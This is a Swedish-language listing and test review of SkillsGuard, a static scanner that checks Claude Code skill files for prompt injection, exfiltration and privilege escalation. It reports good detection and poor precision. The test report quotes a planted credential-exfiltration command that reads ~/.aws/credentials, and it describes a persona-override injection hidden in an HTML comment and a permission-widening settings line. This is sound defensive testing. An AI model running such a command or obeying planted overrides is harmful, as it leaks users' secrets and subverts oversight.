SkillsGuard
Statisk skanner som granskar en SKILL.md för injektion, exfiltrering och eskalering
Fungerar med konfiguration
Vad den gör
Driver SkillsGuard statiska skanner — 15 regelkategorier som täcker prompt injection, exfiltrering, command injection, persistens, privilege escalation, obfuskering och supply chain — över en enskild skill eller en hel skills-mapp, och formaterar sedan resultaten till en allvarlighetsgrupperad bedömning med en rekommendation om att installera/inte installera. Den avkodar base64 och andra obfuskerade blobbar före matchning, så nyttolaster dolda inuti kodade strängar rapporteras med den avkodade bevisningen. Utlöses av förfrågningar som scan this skill, is this skill safe, eller audit my skills folder.
Testrapport
Den avkoda-först-motorn är på riktigt: planterade en skill vars setup.sh dolde `curl -X POST -d @<(cat ~/.aws/credentials)` inuti en base64-blob, och skannern avkodade den och rapporterade credential exfiltration, settings.json behörighetsutvidgningslinjen och persona-override injektionen begravd i en HTML-kommentar — 17 fynd på 16 ms, alla tre attackerna fångade. Precision är problemet. Riktad mot ett verkligt bibliotek med 278 installerade skills gav den 15 480 fynd och bedömde hela mappen 100/100 CRITICAL, flaggade 204 av 278 skills som HIGH-eller-värre; de två mest högljudda reglerna matchar `rm` och `sh` utan ordgränser, så all markdown inline code som innehåller 'format' eller 'publish' rapporteras som command injection. En ofarlig 14-radig antecknings-skill vars enda backtick var `--format markdown` kom tillbaka som MEDIUM med fem HIGH 'command injection'-fynd. Den finns inte heller på npm — SKILL.md ensam gör ingenting, och du måste clone, npm install, build och npm link (eller koppla upp MCP-servern) innan skillen har något att anropa. Användbar som en snabb förinstallationsgranskning av en misstänkt skill; lita inte på dess mappnivåbedömning.
Testad: 2026-08-07 · Claude Code 2.x (agent harness)
Installation
git clone https://github.com/Teycir/SkillsGuard.git mkdir -p ~/.claude/skills cp -r SkillsGuard/skill ~/.claude/skills/skillsguard # scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link
Kommandon och exempelprompter
/skillsguardStatisk skanner som granskar en SKILL.md för injektion, exfiltrering och eskalering
Skills triggas av vanliga förfrågningar — inga kommandon att memorera. Efter installationen aktiverar prompter som dessa skillen (på engelska):
Can you scan this skill for prompt injection before I install it?Is this Claude Code skill safe to install, any red flags?Audit my whole ~/.claude/skills folder for exfiltration risks